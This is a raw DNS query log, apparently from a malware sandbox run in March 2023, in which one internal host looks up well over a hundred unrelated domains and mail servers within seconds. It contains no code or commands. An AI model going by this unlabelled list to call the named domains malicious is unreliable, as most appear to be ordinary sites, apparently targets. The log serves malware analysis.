                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.750996113 CET192.168.2.58.8.8.80x2ed1Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.756547928 CET192.168.2.5192.5.5.2410xcfStandard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.783557892 CET192.168.2.5192.58.128.300x99Standard query (0)orgNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.812089920 CET192.168.2.58.8.8.80x4a9Standard query (0)www.sclover3.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.824006081 CET192.168.2.5192.5.5.2410x9Standard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.839361906 CET192.168.2.58.8.8.80x1e90Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.859138966 CET192.168.2.58.8.8.80x6ea6Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.043193102 CET192.168.2.58.8.8.80x2dc3Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.062588930 CET192.168.2.58.8.8.80x5148Standard query (0)zupraha.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.095396042 CET192.168.2.58.8.8.80xda9Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.109031916 CET192.168.2.58.8.8.80xa90cStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.122570038 CET192.168.2.58.8.8.80x241fStandard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.139616013 CET192.168.2.58.8.8.80x7f43Standard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.153290987 CET192.168.2.58.8.8.80x9e6dStandard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.318978071 CET192.168.2.58.8.8.80x8583Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.343995094 CET192.168.2.58.8.8.80x8ce0Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.347451925 CET192.168.2.58.8.8.80xfebeStandard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.436106920 CET192.168.2.58.8.8.80xb348Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.446257114 CET192.168.2.58.8.8.80x5721Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.450087070 CET192.168.2.58.8.8.80x7e60Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.478646994 CET192.168.2.58.8.8.80xd35dStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.551834106 CET192.168.2.58.8.8.80xe10aStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.574095964 CET192.168.2.58.8.8.80x4d72Standard query (0)piacton.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.600780010 CET192.168.2.58.8.8.80xe0c4Standard query (0)karmy.com.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.609980106 CET192.168.2.58.8.8.80xce1Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.821645975 CET192.168.2.58.8.8.80xda7fStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.050340891 CET192.168.2.58.8.8.80xc731Standard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.278752089 CET192.168.2.58.8.8.80x7170Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.295037031 CET192.168.2.58.8.8.80x6f24Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.401971102 CET192.168.2.58.8.8.80xbc20Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.508930922 CET192.168.2.58.8.8.80x97bdStandard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.512883902 CET192.168.2.58.8.8.80x8843Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.630996943 CET192.168.2.58.8.8.80xebbStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.777513981 CET192.168.2.58.8.8.80xa274Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.777662992 CET192.168.2.58.8.8.80xcc62Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.783400059 CET192.168.2.58.8.8.80x5c46Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.326487064 CET192.168.2.58.8.8.80x6f24Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.423290968 CET192.168.2.58.8.8.80xf345Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.439882994 CET192.168.2.58.8.8.80xb289Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.771291971 CET192.168.2.58.8.8.80xf49eStandard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.150049925 CET192.168.2.58.8.8.80x806aStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.250421047 CET192.168.2.58.8.8.80x6680Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.337697983 CET192.168.2.58.8.8.80x6f24Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.346798897 CET192.168.2.5128.8.10.900xfcStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.354476929 CET192.168.2.58.8.8.80xe769Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.368225098 CET192.168.2.58.8.8.80x55a2Standard query (0)ie-roi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.384463072 CET192.168.2.58.8.8.80x3617Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.396209002 CET192.168.2.58.8.8.80x5347Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.397200108 CET192.168.2.58.8.8.80xc137Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.399166107 CET192.168.2.58.8.8.80x6b9fStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.440196991 CET192.168.2.58.8.8.80x3ccbStandard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.454303026 CET192.168.2.58.8.8.80x8df4Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.566625118 CET192.168.2.58.8.8.80x5c46Standard query (0)hyab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.599505901 CET192.168.2.58.8.8.80xe964Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.700846910 CET192.168.2.58.8.8.80x7467Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.878079891 CET192.168.2.58.8.8.80x897fStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.905642986 CET192.168.2.58.8.8.80xea40Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.950944901 CET192.168.2.58.8.8.80x38fStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.084336996 CET192.168.2.58.8.8.80x91a2Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.146714926 CET192.168.2.58.8.8.80xfaecStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.153743982 CET192.168.2.58.8.8.80xbdecStandard query (0)snf.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.246160984 CET192.168.2.58.8.8.80x4875Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.432156086 CET192.168.2.58.8.8.80xc9c7Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.484348059 CET192.168.2.58.8.8.80x4d77Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.542968035 CET192.168.2.58.8.8.80x7f01Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.556536913 CET192.168.2.58.8.8.80x8221Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.563994884 CET192.168.2.58.8.8.80xb17cStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.575922012 CET192.168.2.58.8.8.80x4ea0Standard query (0)smtp.mail.yahoo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.596731901 CET192.168.2.58.8.8.80x8606Standard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.597616911 CET192.168.2.58.8.8.80x57b5Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.661206007 CET192.168.2.58.8.8.80x176bStandard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.721744061 CET192.168.2.58.8.8.80xdc88Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.834136009 CET192.168.2.58.8.8.80x6af2Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.011274099 CET192.168.2.58.8.8.80xc3c1Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.065593958 CET192.168.2.58.8.8.80x39a9Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.066210985 CET192.168.2.58.8.8.80x60f1Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.073199034 CET192.168.2.58.8.8.80xb130Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.106287003 CET192.168.2.58.8.8.80xb7c9Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.313659906 CET192.168.2.58.8.8.80xbbecStandard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.387470007 CET192.168.2.58.8.8.80x8bfbStandard query (0)komie.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.484743118 CET192.168.2.58.8.8.80x95d1Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.622742891 CET192.168.2.58.8.8.80xf911Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.647948027 CET192.168.2.58.8.8.80xa51fStandard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.802958012 CET192.168.2.58.8.8.80x26d3Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.883972883 CET192.168.2.58.8.8.80x3709Standard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.971949100 CET192.168.2.58.8.8.80x8f2eStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.994255066 CET192.168.2.58.8.8.80x2583Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.376534939 CET192.168.2.58.8.8.80x3646Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.426315069 CET192.168.2.58.8.8.80xbc16Standard query (0)cbras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.429625988 CET192.168.2.58.8.8.80x7edeStandard query (0)kustnara.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.520044088 CET192.168.2.58.8.8.80x7673Standard query (0)4locals.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.649612904 CET192.168.2.58.8.8.80x359cStandard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.757656097 CET192.168.2.58.8.8.80xc097Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.949482918 CET192.168.2.58.8.8.80x50fbStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.975591898 CET192.168.2.58.8.8.80xa0a1Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.480436087 CET192.168.2.58.8.8.80x542dStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.480915070 CET192.168.2.58.8.8.80x454aStandard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.481105089 CET192.168.2.58.8.8.80xfb05Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.503874063 CET192.168.2.58.8.8.80xf7e5Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.517935991 CET192.168.2.58.8.8.80xb019Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.519772053 CET192.168.2.58.8.8.80xe241Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.527093887 CET192.168.2.58.8.8.80xd3b4Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.632117987 CET192.168.2.58.8.8.80x1900Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.741252899 CET192.168.2.58.8.8.80x653dStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.790734053 CET192.168.2.58.8.8.80x4c89Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.297115088 CET192.168.2.58.8.8.80x4804Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.303119898 CET192.168.2.58.8.8.80x6cc6Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.334940910 CET192.168.2.58.8.8.80x33a6Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.346205950 CET192.168.2.58.8.8.80xe9b4Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.358028889 CET192.168.2.58.8.8.80x7f29Standard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.359886885 CET192.168.2.58.8.8.80x4f07Standard query (0)beafin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.360466957 CET192.168.2.58.8.8.80x751bStandard query (0)vvsteknik.dkA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.360539913 CET192.168.2.58.8.8.80x994cStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.374089003 CET192.168.2.58.8.8.80xc470Standard query (0)deckoviny.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.386605978 CET192.168.2.58.8.8.80x8aeeStandard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.392405033 CET192.168.2.58.8.8.80x7716Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.403014898 CET192.168.2.58.8.8.80xef43Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.415733099 CET192.168.2.58.8.8.80x142fStandard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.423847914 CET192.168.2.58.8.8.80xf6c1Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.429486990 CET192.168.2.58.8.8.80x2b17Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.430392981 CET192.168.2.58.8.8.80x906aStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.433607101 CET192.168.2.58.8.8.80xe62aStandard query (0)htsmx.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.435058117 CET192.168.2.58.8.8.80x183eStandard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.436098099 CET192.168.2.58.8.8.80xe385Standard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.523978949 CET192.168.2.58.8.8.80x3f5Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.526736021 CET192.168.2.58.8.8.80x1627Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.589410067 CET192.168.2.58.8.8.80xd4f9Standard query (0)nekono.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.596241951 CET192.168.2.58.8.8.80x66bcStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.617727041 CET192.168.2.58.8.8.80x6717Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.620171070 CET192.168.2.58.8.8.80xfb91Standard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.620326042 CET192.168.2.58.8.8.80x2966Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.649310112 CET192.168.2.58.8.8.80x5863Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.729455948 CET192.168.2.5128.8.10.900xfcStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.739476919 CET192.168.2.58.8.8.80x4e25Standard query (0)agitz.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.743586063 CET192.168.2.58.8.8.80x95f7Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.759690046 CET192.168.2.58.8.8.80xb606Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.782075882 CET192.168.2.58.8.8.80x6f50Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.844425917 CET192.168.2.58.8.8.80xe95fStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.859383106 CET192.168.2.58.8.8.80xcb10Standard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.868125916 CET192.168.2.58.8.8.80x77ffStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.870446920 CET192.168.2.58.8.8.80x9d59Standard query (0)amic.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.905673981 CET192.168.2.58.8.8.80xf730Standard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.034564018 CET192.168.2.58.8.8.80x7fe2Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.049592972 CET192.168.2.58.8.8.80xd913Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.053358078 CET192.168.2.58.8.8.80xdb16Standard query (0)ascc.org.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.053358078 CET192.168.2.58.8.8.80xee90Standard query (0)mackusick.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.070338964 CET192.168.2.58.8.8.80x6c94Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.079880953 CET192.168.2.58.8.8.80x82eaStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.080626011 CET192.168.2.58.8.8.80x3700Standard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.114136934 CET192.168.2.58.8.8.80xefc7Standard query (0)vonparis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.128432035 CET192.168.2.58.8.8.80xb2bStandard query (0)fortknox.bmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.129196882 CET192.168.2.58.8.8.80xcd9Standard query (0)biurohera.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.130244017 CET192.168.2.58.8.8.80xfa8aStandard query (0)vfcindia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.131810904 CET192.168.2.58.8.8.80xb65eStandard query (0)oh28ya.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.138983011 CET192.168.2.58.8.8.80x3d44Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.140747070 CET192.168.2.58.8.8.80x10c6Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.142282963 CET192.168.2.58.8.8.80xe9c0Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.144243002 CET192.168.2.58.8.8.80xc685Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.147802114 CET192.168.2.58.8.8.80xfa73Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.276773930 CET192.168.2.58.8.8.80xc127Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.277544975 CET192.168.2.58.8.8.80x6f6aStandard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.291779041 CET192.168.2.58.8.8.80xd341Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.295186996 CET192.168.2.58.8.8.80x57e6Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.343600035 CET192.168.2.58.8.8.80xd2dbStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.365504980 CET192.168.2.58.8.8.80xf9d4Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.367958069 CET192.168.2.58.8.8.80xa31cStandard query (0)polprime.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.395253897 CET192.168.2.58.8.8.80xcdb7Standard query (0)shiner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.400619030 CET192.168.2.58.8.8.80xc3a7Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.481564999 CET192.168.2.58.8.8.80xb4fbStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.486432076 CET192.168.2.58.8.8.80xf93bStandard query (0)gphpedit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.506963015 CET192.168.2.58.8.8.80x2823Standard query (0)touchfam.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:41.510202885 CET192.168.2.58.8.8.80xd0f4Standard query (0)holp-ai.comA (IP address)IN (0x0001)false
